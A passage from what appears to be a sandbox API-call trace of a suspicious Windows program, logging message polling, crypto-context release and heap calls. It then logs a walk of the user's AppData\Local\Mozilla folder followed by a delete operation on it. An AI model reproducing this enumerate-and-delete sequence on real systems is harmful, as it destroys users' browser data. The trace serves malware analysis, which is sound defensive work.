wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.672] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0174.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.672] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0174.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.672] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0174.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.672] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0174.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.672] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.672] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.672] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.672] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.672] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.672] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.672] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0174.673] CryptReleaseContext (hProv=0xa7c550, dwFlags=0x0) returned 1 [0174.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.673] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.673] FreeLibrary (hLibModule=0x76390000) returned 1 [0174.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.673] CloseHandle (hObject=0x4fc) returned 1 [0174.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.675] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.675] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0174.675] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0174.675] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Mozilla", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpFilePart=0x8cedf4*="Mozilla") returned 0x25 [0174.675] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\mozilla")) returned 0x10 [0174.675] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1b78 [0174.675] FindNextFileW (in: hFindFile=0x9e1b78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0174.676] FindNextFileW (in: hFindFile=0x9e1b78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Firefox", cAlternateFileName="")) returned 1 [0174.676] FindNextFileW (in: hFindFile=0x9e1b78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x190eac40, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x190eac40, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="updates", cAlternateFileName="")) returned 1 [0174.676] FindNextFileW (in: hFindFile=0x9e1b78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x190eac40, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x190eac40, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="updates", cAlternateFileName="")) returned 0 [0174.676] FindClose (in: hFindFile=0x9e1b78 | out: hFindFile=0x9e1b78) returned 1 [0174.677] GetLastError () returned 0x12 [0174.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0174.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0174.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.677] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0174.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0174.677] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0174.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0174.677] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0174.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0174.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0174.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0174.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0174.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0174.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0174.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0174.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb058 [0174.679] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Mozilla", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpFilePart=0x8cf650*="Mozilla") returned 0x25 [0174.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0174.679] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\mozilla")) returned 0x10 [0174.679] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, 